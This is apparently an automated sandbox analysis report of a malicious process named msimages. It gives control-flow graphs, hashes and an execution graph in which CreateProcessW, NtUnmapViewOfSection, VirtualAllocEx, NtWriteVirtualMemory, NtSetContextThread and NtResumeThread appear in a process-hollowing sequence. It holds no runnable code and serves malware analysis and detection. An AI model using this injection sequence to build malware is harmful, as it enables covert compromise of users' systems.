                                                control_flow_graph 310 4457a0-44585a 312 445860-44589b 310->312 313 445912-445927 310->313 329 4458d3-4458e4 312->329 330 44589d-4458a5 312->330 314 4459d7-4459db 313->314 315 44592d-445973 313->315 317 445a25-445a76 314->317 318 4459dd-445a1f 314->318 333 445975-44597d 315->333 334 4459b1-4459bc 315->334 320 445a7c-445ab7 317->320 321 445b2e-445b40 317->321 318->317 351 445aef-445b00 320->351 352 445ab9-445ac1 320->352 322 445b42-445b5a 321->322 323 445b5d-445b6f 321->323 322->323 327 445b71-445b89 323->327 328 445b8c-445c02 CreateProcessW 323->328 327->328 335 445c04-445c0a 328->335 336 445c0b-445c4c 328->336 345 4458ea-44590a 329->345 337 4458a7-4458b1 330->337 338 4458c8-4458d1 330->338 340 4459a0-4459af 333->340 341 44597f-445989 333->341 353 4459c2-4459d1 334->353 335->336 359 445c63-445c7a 336->359 360 445c4e-445c5d 336->360 342 4458b5-4458c4 337->342 343 4458b3 337->343 338->345 340->353 348 44598d-44599c 341->348 349 44598b 341->349 342->342 354 4458c6 342->354 343->342 345->313 348->348 356 44599e 348->356 349->348 361 445b06-445b26 351->361 357 445ae4-445aed 352->357 358 445ac3-445acd 352->358 353->314 354->338 356->340 357->361 363 445ad1-445ae0 358->363 364 445acf 358->364 368 445c93-445ca3 359->368 369 445c7c-445c88 359->369 360->359 361->321 363->363 366 445ae2 363->366 364->363 366->357 370 445ca5-445cb4 368->370 371 445cba-445cfd 368->371 369->368 370->371 376 445d0d-445d11 371->376 377 445cff-445d03 371->377 379 445d21-445d25 376->379 380 445d13-445d17 376->380 377->376 378 445d05-445d08 call 440420 377->378 378->376 383 445d35 379->383 384 445d27-445d2b 379->384 380->379 382 445d19-445d1c call 440420 380->382 382->379 388 445d36 383->388 384->383 386 445d2d-445d30 call 440420 384->386 386->383 388->388
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 00445BEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: ce797453196ce4b0f4bcbc5ddcc88c6fe0e4e78ec7440a973262d5903b16037c
                                                • Instruction ID: 6d1cd429dff4a99e4b58ceec535472c2433cd249184ca85d381a6b3d4adf07f6
                                                • Opcode Fuzzy Hash: ce797453196ce4b0f4bcbc5ddcc88c6fe0e4e78ec7440a973262d5903b16037c
                                                • Instruction Fuzzy Hash: 2D02B174E002188FEF24CFA9D885B9DBBB1BF49304F1481AAE419B7351DB34AA85CF55
                                                Function 00445794 Relevance: 1.9, APIs: 1, Instructions: 389processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 389 445794-44585a 392 445860-44589b 389->392 393 445912-445927 389->393 409 4458d3-4458e4 392->409 410 44589d-4458a5 392->410 394 4459d7-4459db 393->394 395 44592d-445973 393->395 397 445a25-445a76 394->397 398 4459dd-445a1f 394->398 413 445975-44597d 395->413 414 4459b1-4459bc 395->414 400 445a7c-445ab7 397->400 401 445b2e-445b40 397->401 398->397 431 445aef-445b00 400->431 432 445ab9-445ac1 400->432 402 445b42-445b5a 401->402 403 445b5d-445b6f 401->403 402->403 407 445b71-445b89 403->407 408 445b8c-445c02 CreateProcessW 403->408 407->408 415 445c04-445c0a 408->415 416 445c0b-445c4c 408->416 425 4458ea-44590a 409->425 417 4458a7-4458b1 410->417 418 4458c8-4458d1 410->418 420 4459a0-4459af 413->420 421 44597f-445989 413->421 433 4459c2-4459d1 414->433 415->416 439 445c63-445c7a 416->439 440 445c4e-445c5d 416->440 422 4458b5-4458c4 417->422 423 4458b3 417->423 418->425 420->433 428 44598d-44599c 421->428 429 44598b 421->429 422->422 434 4458c6 422->434 423->422 425->393 428->428 436 44599e 428->436 429->428 441 445b06-445b26 431->441 437 445ae4-445aed 432->437 438 445ac3-445acd 432->438 433->394 434->418 436->420 437->441 443 445ad1-445ae0 438->443 444 445acf 438->444 448 445c93-445ca3 439->448 449 445c7c-445c88 439->449 440->439 441->401 443->443 446 445ae2 443->446 444->443 446->437 450 445ca5-445cb4 448->450 451 445cba-445cfd 448->451 449->448 450->451 456 445d0d-445d11 451->456 457 445cff-445d03 451->457 459 445d21-445d25 456->459 460 445d13-445d17 456->460 457->456 458 445d05-445d08 call 440420 457->458 458->456 463 445d35 459->463 464 445d27-445d2b 459->464 460->459 462 445d19-445d1c call 440420 460->462 462->459 468 445d36 463->468 464->463 466 445d2d-445d30 call 440420 464->466 466->463 468->468
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 00445BEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 11f05f5cf0e15e39b4c63a0b3511e5af0f5ff8790ccb2779496b1531feda6cdd
                                                • Instruction ID: 48b3ff5a41c8a3491c16cb03faa6cab3f3eddffbb87c08f6d6fa8502d734a693
                                                • Opcode Fuzzy Hash: 11f05f5cf0e15e39b4c63a0b3511e5af0f5ff8790ccb2779496b1531feda6cdd
                                                • Instruction Fuzzy Hash: C2F1C1B4D002188FEF24CFA9D885B9DBBB1BF49304F1481AAE419B7351D738AA85CF55
                                                Function 004465A0 Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 618 4465a0-446610 621 446627-446688 NtWriteVirtualMemory 618->621 622 446612-446624 618->622 624 446691-4466e3 621->624 625 44668a-446690 621->625 622->621 625->624
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00446678
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 1f4e656cd16370df01b3a5440de1b7e7a17f0a5d16782b3f4978ffec179df5d9
                                                • Instruction ID: c9247e50e9981453ca2dae363d4b2b5401bafea7ca47974f94f70a9ec5b2c9db
                                                • Opcode Fuzzy Hash: 1f4e656cd16370df01b3a5440de1b7e7a17f0a5d16782b3f4978ffec179df5d9
                                                • Instruction Fuzzy Hash: 3241CEB5D012589FDF00CFA9D984AEEFBF1BF49314F24902AE818B7250D339AA45CB54
                                                Function 004465A8 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 630 4465a8-446610 632 446627-446688 NtWriteVirtualMemory 630->632 633 446612-446624 630->633 635 446691-4466e3 632->635 636 44668a-446690 632->636 633->632 636->635
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00446678
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 659a1f01fbbe52c155bea08385a931e443dfc46cac78789d5404fac43b38ba99
                                                • Instruction ID: 8a4652927a0f50ade787c663f8f63580e71f8a308df8f7d891624487b32caee0
                                                • Opcode Fuzzy Hash: 659a1f01fbbe52c155bea08385a931e443dfc46cac78789d5404fac43b38ba99
                                                • Instruction Fuzzy Hash: 9441ACB5D012589FDF00CFA9D984AEEFBF1BF49310F24942AE818B7250D379AA45CB54
                                                Function 00446258 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 641 446258-44631a NtReadVirtualMemory 644 446323-446375 641->644 645 44631c-446322 641->645 645->644
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0044630A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 787bbb16a00e59fc83cef6b10fa9063d9f3a7404fb509848a70ebcd03fb615d9
                                                • Instruction ID: 4afc008821ab07ef949d63ee799435579aaa80c41bb017a823b77d7b4f897184
                                                • Opcode Fuzzy Hash: 787bbb16a00e59fc83cef6b10fa9063d9f3a7404fb509848a70ebcd03fb615d9
                                                • Instruction Fuzzy Hash: 5041BDB5D002589FDF10CFA9D884AEEFBB1BF49310F10942AE814B7250D739AA45CF69
                                                Function 004466F9 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 668 4466f9-446760 670 446777-4467bf NtSetContextThread 668->670 671 446762-446774 668->671 673 4467c1-4467c7 670->673 674 4467c8-446814 670->674 671->670 673->674
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 004467AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: b87119afb26671b0ab400ca918d77e503802edb7359bf36b98ade5401ee952d2
                                                • Instruction ID: d248d630b978b88924bd26765e826afb62a5142c95cb443e6a590a094e2f533a
                                                • Opcode Fuzzy Hash: b87119afb26671b0ab400ca918d77e503802edb7359bf36b98ade5401ee952d2
                                                • Instruction Fuzzy Hash: 6841BDB5D002589FDB10CFA9D884AEEBBF1AF89314F24802AE418B7250D738AA45CF54
                                                Function 00446700 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 679 446700-446760 681 446777-4467bf NtSetContextThread 679->681 682 446762-446774 679->682 684 4467c1-4467c7 681->684 685 4467c8-446814 681->685 682->681 684->685
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 004467AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 20398ab73389aebf5d467d15ec2aa16569654469df7270f544a97867afb8782d
                                                • Instruction ID: 67c58265330236a860f7fd2dd4dc2b9054463ef373fd221969b362c809cece66
                                                • Opcode Fuzzy Hash: 20398ab73389aebf5d467d15ec2aa16569654469df7270f544a97867afb8782d
                                                • Instruction Fuzzy Hash: BC31BEB4D002589FDB10CFA9D884AEEFBF1BF49314F24802AE418B7250D778AA45CF55
                                                Function 00446388 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 690 446388-446421 NtResumeThread 693 446423-446429 690->693 694 44642a-44646e 690->694 693->694
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 00446411
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: e95c57ce5c77ccb8e3789e2ba8f68c4f3d36c68365ec132e93b15776d5723c4a
                                                • Instruction ID: 40ab92e45871d7c61990b7f6ef7437592f58dcfed57f9a792f4e976ecb1610e7
                                                • Opcode Fuzzy Hash: e95c57ce5c77ccb8e3789e2ba8f68c4f3d36c68365ec132e93b15776d5723c4a
                                                • Instruction Fuzzy Hash: 1E31ACB4D012189FDF10CFA9D884ADEFBB1BF89310F20942AE814B7240D775A945CF99
                                                Function 00446481 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 650 446481-446542 VirtualAllocEx 653 446544-44654a 650->653 654 44654b-446595 650->654 653->654
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00446532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2a31fef6901b795da0ce407703c7b554e98ecac1b677a0bc3af06dd016f57b40
                                                • Instruction ID: d086ecbc40ce577703e980afa9d155ccad9d75ebcb14046912767071dd2d4404
                                                • Opcode Fuzzy Hash: 2a31fef6901b795da0ce407703c7b554e98ecac1b677a0bc3af06dd016f57b40
                                                • Instruction Fuzzy Hash: AB31ABB5D042589FDF10CFA9E884AEEFBB1BF49310F10942AE814B7210D735A946CF59
                                                Function 00446488 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 659 446488-446542 VirtualAllocEx 662 446544-44654a 659->662 663 44654b-446595 659->663 662->663
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00446532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a1d44352adf40ddf3daaa50b20041af588d4cedb56156ce1fcff29c4181caea5
                                                • Instruction ID: ee509af22d5be5995e7892453ccc4cbf41de8948c9079cfd9ff6e4feae065024
                                                • Opcode Fuzzy Hash: a1d44352adf40ddf3daaa50b20041af588d4cedb56156ce1fcff29c4181caea5
                                                • Instruction Fuzzy Hash: 573189B5D002589FDF10CFA9E884AEEFBB1BF49310F20942AE814B7210D735A946CF59

                                                Execution Graph

                                                Execution Coverage:34.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:133
                                                Total number of Limit Nodes:0
                                                execution_graph 3013 1c5794 3015 1c5830 CreateProcessW 3013->3015 3016 1c5c04 3015->3016 2861 1c57a0 2863 1c5830 CreateProcessW 2861->2863 2864 1c5c04 2863->2864 2865 1c3dc0 2866 1c3ddc 2865->2866 2871 1c4a5d 2866->2871 2867 1c3e90 2912 1c6851 2867->2912 2872 1c4c7c 2871->2872 2953 1c5d80 2872->2953 2958 1c5d71 2872->2958 2873 1c4e33 2896 1c5d80 2 API calls 2873->2896 2897 1c5d71 2 API calls 2873->2897 2874 1c4e77 2963 1c6388 2874->2963 2967 1c6381 2874->2967 2875 1c4efd 2900 1c5d80 2 API calls 2875->2900 2901 1c5d71 2 API calls 2875->2901 2876 1c4f89 2971 1c6488 2876->2971 2975 1c6481 2876->2975 2877 1c4fc7 2910 1c5d80 2 API calls 2877->2910 2911 1c5d71 2 API calls 2877->2911 2878 1c50f0 2979 1c65a0 2878->2979 2983 1c65a8 2878->2983 2879 1c512c 2894 1c5d80 2 API calls 2879->2894 2895 1c5d71 2 API calls 2879->2895 2880 1c54b4 2908 1c65a8 NtWriteVirtualMemory 2880->2908 2909 1c65a0 NtWriteVirtualMemory 2880->2909 2881 1c55bd 2892 1c5d80 2 API calls 2881->2892 2893 1c5d71 2 API calls 2881->2893 2882 1c560b 2987 1c6700 2882->2987 2991 1c66f9 2882->2991 2883 1c56b3 2906 1c6388 NtUnmapViewOfSection 2883->2906 2907 1c6381 NtUnmapViewOfSection 2883->2907 2884 1c5730 2884->2867 2885 1c518b 2885->2880 2890 1c65a8 NtWriteVirtualMemory 2885->2890 2891 1c65a0 NtWriteVirtualMemory 2885->2891 2890->2885 2891->2885 2892->2882 2893->2882 2894->2885 2895->2885 2896->2874 2897->2874 2900->2876 2901->2876 2906->2884 2907->2884 2908->2881 2909->2881 2910->2878 2911->2878 2913 1c6894 2912->2913 3003 1c73b8 2913->3003 3008 1c73a8 2913->3008 2914 1c6a4b 2929 1c73b8 2 API calls 2914->2929 2930 1c73a8 2 API calls 2914->2930 2915 1c6a8f 2931 1c6388 NtUnmapViewOfSection 2915->2931 2932 1c6381 NtUnmapViewOfSection 2915->2932 2916 1c6b15 2933 1c73b8 2 API calls 2916->2933 2934 1c73a8 2 API calls 2916->2934 2917 1c6ba1 2935 1c6488 VirtualAllocEx 2917->2935 2936 1c6481 VirtualAllocEx 2917->2936 2918 1c6bdf 2943 1c73b8 2 API calls 2918->2943 2944 1c73a8 2 API calls 2918->2944 2919 1c6d08 2945 1c65a8 NtWriteVirtualMemory 2919->2945 2946 1c65a0 NtWriteVirtualMemory 2919->2946 2920 1c6d44 2927 1c73b8 2 API calls 2920->2927 2928 1c73a8 2 API calls 2920->2928 2921 1c70cc 2941 1c65a8 NtWriteVirtualMemory 2921->2941 2942 1c65a0 NtWriteVirtualMemory 2921->2942 2922 1c71d5 2951 1c73b8 2 API calls 2922->2951 2952 1c73a8 2 API calls 2922->2952 2923 1c7223 2937 1c66f9 NtSetContextThread 2923->2937 2938 1c6700 NtSetContextThread 2923->2938 2924 1c72cb 2939 1c6388 NtUnmapViewOfSection 2924->2939 2940 1c6381 NtUnmapViewOfSection 2924->2940 2925 1c3ef2 2926 1c6da3 2926->2921 2949 1c65a8 NtWriteVirtualMemory 2926->2949 2950 1c65a0 NtWriteVirtualMemory 2926->2950 2927->2926 2928->2926 2929->2915 2930->2915 2931->2916 2932->2916 2933->2917 2934->2917 2935->2918 2936->2918 2937->2924 2938->2924 2939->2925 2940->2925 2941->2922 2942->2922 2943->2919 2944->2919 2945->2920 2946->2920 2949->2926 2950->2926 2951->2923 2952->2923 2954 1c5da4 2953->2954 2995 1c6258 2954->2995 2999 1c6250 2954->2999 2955 1c5e59 2955->2873 2960 1c5da4 2958->2960 2959 1c5e59 2959->2873 2961 1c6258 NtReadVirtualMemory 2960->2961 2962 1c6250 NtReadVirtualMemory 2960->2962 2961->2959 2962->2959 2964 1c63cc NtUnmapViewOfSection 2963->2964 2966 1c6423 2964->2966 2966->2875 2968 1c63cc NtUnmapViewOfSection 2967->2968 2970 1c6423 2968->2970 2970->2875 2972 1c64cc VirtualAllocEx 2971->2972 2974 1c6544 2972->2974 2974->2877 2976 1c64cc VirtualAllocEx 2975->2976 2978 1c6544 2976->2978 2978->2877 2980 1c65f1 NtWriteVirtualMemory 2979->2980 2982 1c668a 2980->2982 2982->2879 2984 1c65f1 NtWriteVirtualMemory 2983->2984 2986 1c668a 2984->2986 2986->2879 2988 1c6749 NtSetContextThread 2987->2988 2990 1c67c1 2988->2990 2990->2883 2992 1c6749 NtSetContextThread 2991->2992 2994 1c67c1 2992->2994 2994->2883 2996 1c62a4 NtReadVirtualMemory 2995->2996 2998 1c631c 2996->2998 2998->2955 3000 1c62a4 NtReadVirtualMemory 2999->3000 3002 1c631c 3000->3002 3002->2955 3004 1c73dc 3003->3004 3006 1c6258 NtReadVirtualMemory 3004->3006 3007 1c6250 NtReadVirtualMemory 3004->3007 3005 1c7491 3005->2914 3006->3005 3007->3005 3009 1c73dc 3008->3009 3011 1c6258 NtReadVirtualMemory 3009->3011 3012 1c6250 NtReadVirtualMemory 3009->3012 3010 1c7491 3010->2914 3011->3010 3012->3010 3017 1c3db0 3018 1c3ddc 3017->3018 3022 1c4a5d 10 API calls 3018->3022 3019 1c3e90 3021 1c6851 10 API calls 3019->3021 3020 1c3ef2 3021->3020 3022->3019

                                                Executed Functions

                                                Function 001C57A0 Relevance: 1.9, APIs: 1, Instructions: 397processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 1c57a0-1c585a 322 1c5860-1c589b 320->322 323 1c5912-1c5927 320->323 340 1c589d-1c58a5 322->340 341 1c58d3-1c58e4 322->341 324 1c592d-1c5973 323->324 325 1c59d7-1c59db 323->325 345 1c5975-1c597d 324->345 346 1c59b1-1c59bc 324->346 326 1c59dd-1c5a1f 325->326 327 1c5a25-1c5a76 325->327 326->327 330 1c5a7c-1c5ab7 327->330 331 1c5b2e-1c5b40 327->331 357 1c5aef-1c5b00 330->357 358 1c5ab9-1c5ac1 330->358 333 1c5b5d-1c5b6f 331->333 334 1c5b42-1c5b5a 331->334 337 1c5b8c-1c5c02 CreateProcessW 333->337 338 1c5b71-1c5b89 333->338 334->333 347 1c5c0b-1c5c4c 337->347 348 1c5c04-1c5c0a 337->348 338->337 342 1c58c8-1c58d1 340->342 343 1c58a7-1c58b1 340->343 352 1c58ea-1c590a 341->352 342->352 350 1c58b5-1c58c4 343->350 351 1c58b3 343->351 354 1c597f-1c5989 345->354 355 1c59a0-1c59af 345->355 360 1c59c2-1c59d1 346->360 369 1c5c4e-1c5c5d 347->369 370 1c5c63-1c5c7a 347->370 348->347 350->350 359 1c58c6 350->359 351->350 352->323 364 1c598d-1c599c 354->364 365 1c598b 354->365 355->360 373 1c5b06-1c5b26 357->373 367 1c5ae4-1c5aed 358->367 368 1c5ac3-1c5acd 358->368 359->342 360->325 364->364 366 1c599e 364->366 365->364 366->355 367->373 371 1c5acf 368->371 372 1c5ad1-1c5ae0 368->372 369->370 378 1c5c7c-1c5c88 370->378 379 1c5c93-1c5ca3 370->379 371->372 372->372 375 1c5ae2 372->375 373->331 375->367 378->379 380 1c5cba-1c5cfd 379->380 381 1c5ca5-1c5cb4 379->381 386 1c5d0d-1c5d11 380->386 387 1c5cff-1c5d03 380->387 381->380 389 1c5d21-1c5d25 386->389 390 1c5d13-1c5d17 386->390 387->386 388 1c5d05-1c5d08 call 1c0420 387->388 388->386 393 1c5d35 389->393 394 1c5d27-1c5d2b 389->394 390->389 392 1c5d19-1c5d1c call 1c0420 390->392 392->389 398 1c5d36 393->398 394->393 395 1c5d2d-1c5d30 call 1c0420 394->395 395->393 398->398
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001C5BEF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 25283be3e73a3a5c804466f447d2258550815f04947053ac4806154a7178f677
                                                • Instruction ID: aa4f07bf3f933860f230daf7062bdd27e361928b863526a6d285c3806afc2401
                                                • Opcode Fuzzy Hash: 25283be3e73a3a5c804466f447d2258550815f04947053ac4806154a7178f677
                                                • Instruction Fuzzy Hash: 6902B274E00228CFEB24CFA9C885B9DBBB2BF49304F1481A9E419B7251D774AE85CF55
                                                Function 001C5794 Relevance: 1.9, APIs: 1, Instructions: 389processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 1c5794-1c585a 401 1c5860-1c589b 399->401 402 1c5912-1c5927 399->402 419 1c589d-1c58a5 401->419 420 1c58d3-1c58e4 401->420 403 1c592d-1c5973 402->403 404 1c59d7-1c59db 402->404 424 1c5975-1c597d 403->424 425 1c59b1-1c59bc 403->425 405 1c59dd-1c5a1f 404->405 406 1c5a25-1c5a76 404->406 405->406 409 1c5a7c-1c5ab7 406->409 410 1c5b2e-1c5b40 406->410 436 1c5aef-1c5b00 409->436 437 1c5ab9-1c5ac1 409->437 412 1c5b5d-1c5b6f 410->412 413 1c5b42-1c5b5a 410->413 416 1c5b8c-1c5c02 CreateProcessW 412->416 417 1c5b71-1c5b89 412->417 413->412 426 1c5c0b-1c5c4c 416->426 427 1c5c04-1c5c0a 416->427 417->416 421 1c58c8-1c58d1 419->421 422 1c58a7-1c58b1 419->422 431 1c58ea-1c590a 420->431 421->431 429 1c58b5-1c58c4 422->429 430 1c58b3 422->430 433 1c597f-1c5989 424->433 434 1c59a0-1c59af 424->434 439 1c59c2-1c59d1 425->439 448 1c5c4e-1c5c5d 426->448 449 1c5c63-1c5c7a 426->449 427->426 429->429 438 1c58c6 429->438 430->429 431->402 443 1c598d-1c599c 433->443 444 1c598b 433->444 434->439 452 1c5b06-1c5b26 436->452 446 1c5ae4-1c5aed 437->446 447 1c5ac3-1c5acd 437->447 438->421 439->404 443->443 445 1c599e 443->445 444->443 445->434 446->452 450 1c5acf 447->450 451 1c5ad1-1c5ae0 447->451 448->449 457 1c5c7c-1c5c88 449->457 458 1c5c93-1c5ca3 449->458 450->451 451->451 454 1c5ae2 451->454 452->410 454->446 457->458 459 1c5cba-1c5cfd 458->459 460 1c5ca5-1c5cb4 458->460 465 1c5d0d-1c5d11 459->465 466 1c5cff-1c5d03 459->466 460->459 468 1c5d21-1c5d25 465->468 469 1c5d13-1c5d17 465->469 466->465 467 1c5d05-1c5d08 call 1c0420 466->467 467->465 472 1c5d35 468->472 473 1c5d27-1c5d2b 468->473 469->468 471 1c5d19-1c5d1c call 1c0420 469->471 471->468 477 1c5d36 472->477 473->472 474 1c5d2d-1c5d30 call 1c0420 473->474 474->472 477->477
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001C5BEF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c696d0bfca847e080e7023285f9ca89039139750fb49ad777f6bd4a883294008
                                                • Instruction ID: d84d78c3a3ffab6ca16c3dfd431a696b204d2927c9995470e601b630e336a775
                                                • Opcode Fuzzy Hash: c696d0bfca847e080e7023285f9ca89039139750fb49ad777f6bd4a883294008
                                                • Instruction Fuzzy Hash: FEF1C274D00218CFEB24CFA9C885BADBBB2BF49304F1481A9E419B7251D774AE85CF55
                                                Function 001C65A0 Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 776 1c65a0-1c6610 778 1c6627-1c6688 NtWriteVirtualMemory 776->778 779 1c6612-1c6624 776->779 781 1c668a-1c6690 778->781 782 1c6691-1c66e3 778->782 779->778 781->782
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C6678
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: bdb8e346ce5facdb07f49c04d222e098ab4908bee75b2f813244e3834c04ff33
                                                • Instruction ID: c14ed25473be45f5afd9d2e1ecf456ae00f289ab285bff385dcc6922f9488258
                                                • Opcode Fuzzy Hash: bdb8e346ce5facdb07f49c04d222e098ab4908bee75b2f813244e3834c04ff33
                                                • Instruction Fuzzy Hash: AA41BCB5D012589FDF10CFA9D984AEEFBF1BF49310F24902AE818B7250D339AA45CB54
                                                Function 001C65A8 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 787 1c65a8-1c6610 789 1c6627-1c6688 NtWriteVirtualMemory 787->789 790 1c6612-1c6624 787->790 792 1c668a-1c6690 789->792 793 1c6691-1c66e3 789->793 790->789 792->793
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C6678
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
